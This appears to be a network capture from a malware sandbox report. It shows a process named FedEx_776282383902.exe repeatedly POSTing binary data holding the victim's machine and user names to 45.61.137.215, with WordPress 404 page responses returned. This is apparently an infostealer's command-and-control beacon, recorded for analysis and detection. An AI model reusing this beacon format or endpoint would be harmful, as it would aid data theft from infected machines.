May 22, 2024 22:01:47.048456907 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 22, 2024 22:01:47.057940006 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:01:47.061786890 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:01:47.061800957 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:01:47.061811924 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49708	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:01:47.110311985 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:01:47.176254034 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:01:50.267817974 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:01:47 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:01:50.268203974 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:01:50.268959045 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:01:50.269798040 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:01:50.269813061 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 22, 2024 22:01:50.269824028 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 22, 2024 22:01:50.271435022 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:01:50.272250891 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:01:50.272264957 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:01:50.273055077 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49709	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:01:50.434634924 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:01:50.447763920 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:01:53.568820953 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:01:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:01:53.571342945 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:01:53.578866959 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:01:53.582813025 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:01:53.582827091 CEST	448	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 22, 2024 22:01:53.582840919 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 22, 2024 22:01:53.582853079 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 22, 2024 22:01:53.594297886 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:01:53.598608971 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:01:53.598623991 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49710	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:01:53.733913898 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:01:53.784646034 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:01:57.011265039 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:01:54 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:01:57.011821032 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:01:57.012914896 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
